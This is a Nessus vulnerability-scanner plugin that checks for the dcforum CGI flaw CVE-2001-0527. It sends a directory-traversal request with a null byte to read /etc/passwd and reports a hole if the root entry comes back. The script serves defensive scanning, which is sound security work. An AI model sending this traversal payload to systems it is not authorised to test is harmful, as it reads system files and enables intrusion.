#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10583);
 script_cve_id("CVE-2001-0527");
 script_bugtraq_id(2728);
 
 script_version ("$Revision: 1.8.2.1 $");
 name["english"] = "dcforum";
 name["francais"] = "dcforum";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The 'dcforum' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious";


 desc["francais"] = "Le cgi 'dcforum' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de faire
executer des commandes arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Solution : retirez-le de /cgi-bin.

Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/dcforum";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/dcforum";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;

if(!get_port_state(port))exit(0);

req = http_get(item:"/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00",
 		port:port);
soc = http_open_socket(port);
if(!soc)exit(0);
send(socket:soc, data:req);
r = http_recv(socket:soc);
http_close_socket(soc);
if(egrep(pattern:".*root:.*:0:0:.*", string:r))	
{
 	security_hole(port);
 	exit(0);
}


cgibin = cgibin();

req = http_get(item:string(cgibin,"/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00"),
 		port:port);
soc = http_open_socket(port);
if(!soc)exit(0);

send(socket:soc, data:req);
r = http_recv(socket:soc, length:4096);
http_close_socket(soc);
if(egrep(pattern:".*root:.*:0:0:.*", string:r))	
{
 	security_hole(port);
 	exit(0);
}



